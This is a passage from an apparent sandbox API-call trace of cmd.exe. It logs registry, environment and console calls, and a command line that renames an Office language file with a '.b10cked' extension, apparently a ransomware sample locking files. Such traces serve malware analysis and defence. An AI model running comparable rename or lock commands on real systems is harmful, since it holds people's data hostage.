lpBuffer=0x24fb94, dwLength=0x1c | out: lpBuffer=0x24fb94*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0158.616] GetConsoleOutputCP () returned 0x1b5 [0158.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.616] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.616] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.617] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.617] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.617] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.617] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.617] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.617] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.618] GetEnvironmentStringsW () returned 0x2e0218* [0158.618] FreeEnvironmentStringsW (penv=0x2e0218) returned 1 [0158.618] GetEnvironmentStringsW () returned 0x2e0218* [0158.618] FreeEnvironmentStringsW (penv=0x2e0218) returned 1 [0158.618] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb34 | out: phkResult=0x24eb34*=0x40) returned 0x0 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0xa8, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.618] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x0, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegCloseKey (hKey=0x40) returned 0x0 [0158.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb34 | out: phkResult=0x24eb34*=0x40) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x40, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x1, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x0, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x4, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x4) returned 0x0 [0158.619] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb3c, lpData=0x24eb40, lpcbData=0x24eb38*=0x1000 | out: lpType=0x24eb3c*=0x0, lpData=0x24eb40*=0x9, lpcbData=0x24eb38*=0x1000) returned 0x2 [0158.619] RegCloseKey (hKey=0x40) returned 0x0 [0158.619] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.619] srand (_Seed=0x5b886381) [0158.619] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" [0158.619] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"" [0158.620] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.620] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.620] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.620] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.620] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.620] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.620] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.620] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.621] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.621] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.621] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.621] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.621] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.621] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.621] GetEnvironmentStringsW () returned 0x2e2368* [0158.621] FreeEnvironmentStringsW (penv=0x2e2368) returned 1 [0158.621] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.621] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.621] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.621] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.621] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.621] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.621] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.621] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f900 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f900, lpFilePart=0x24f8fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f8fc*="Desktop") returned 0x18 [0158.623] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.625] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.625] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.625] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.625] GetEnvironmentStringsW () returned 0x2e0218* [0158.625] FreeEnvironmentStringsW (penv=0x2e0218) returned 1 [0158.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.626] GetConsoleOutputCP () returned 0x1b5 [0158.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.626] GetUserDefaultLCID () returned 0x409 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa40, cchData=128 | out: lpLCData="0") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fa40, cchData=128 | out: lpLCData="0") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fa40, cchData=128 | out: lpLCData="1") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.628] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.628] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.628] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.629] GetConsoleTitleW (in: lpConsoleTitle=0x2d0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.630] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.630] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.630] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.630] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.630] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.630] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.630] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.641] GetConsoleTitleW (in: lpConsoleTitle=0x24f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.642] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.643] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.643] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.643] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.643] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.643] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.643] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.643] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.643] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.644] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.644] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.646] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.646] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.647] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f4f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f4ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f4ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.649] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.649] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0158.650] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzi~1.trx")) returned 0x2020 [0158.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.650] SetErrorMode (uMode=0x0) returned 0x0 [0158.650] SetErrorMode (uMode=0x1) returned 0x0 [0158.650] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x24ee7c, lpFilePart=0x24ee64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", lpFilePart=0x24ee64*="PUBWZI~1.TRX") returned 0x3c [0158.650] SetErrorMode (uMode=0x0) returned 0x1 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.650] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0158.650] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzi~1.trx")) returned 0x2020 [0158.651] SetErrorMode (uMode=0x0) returned 0x0 [0158.651] SetErrorMode (uMode=0x1) returned 0x0 [0158.651] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x24f2f8, lpFilePart=0x24f090 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", lpFilePart=0x24f090*="PUBWZI~1.TRX") returned 0x3c [0158.651] SetErrorMode (uMode=0x0) returned 0x1 [0158.651] SetErrorMode (uMode=0x0) returned 0x0 [0158.651] SetErrorMode (uMode=0x1) returned 0x0 [0158.651] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f500, lpFilePart=0x24f090 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x24f090*="PUBWZINT.REST.trx_dll.b10cked") returned 0x4d [0158.651] SetErrorMode (uMode=0x0) returned 0x1 [0158.651] SetLastError (dwErrCode=0x0) [0158.651] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll.b10cked")) returned 0xffffffff [0158.651] GetLastError () returned 0x2 [0158.651] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x24ea0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ea0c) returned 0x2e2138 [0158.651] FindNextFileW (in: hFindFile=0x2e2138, lpFindFileData=0x24ea0c | out: lpFindFileData=0x24ea0c) returned 0 [0158.652] GetLastError () returned 0x12 [0158.652] FindClose (in: hFindFile=0x2e2138 | out: hFindFile=0x2e2138) returned 1 [0158.653] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cc8) returned 0x2e2138 [0158.654] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0158.654] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x24eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0158.654] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll")) returned 0x2020 [0158.654] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.654] FindClose (in: hFindFile=0x2e2138 | out: hFindFile=0x2e2138) returned 1 [0158.654] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec58 | out: _Buffer=" 1") returned 9 [0158.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.655] GetFileType (hFile=0x7) returned 0x2 [0158.655] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ebe4 | out: lpMode=0x24ebe4) returned 1 [0158.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.655] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ec18 | out: lpConsoleScreenBufferInfo=0x24ec18) returned 1 [0158.655] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.656] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 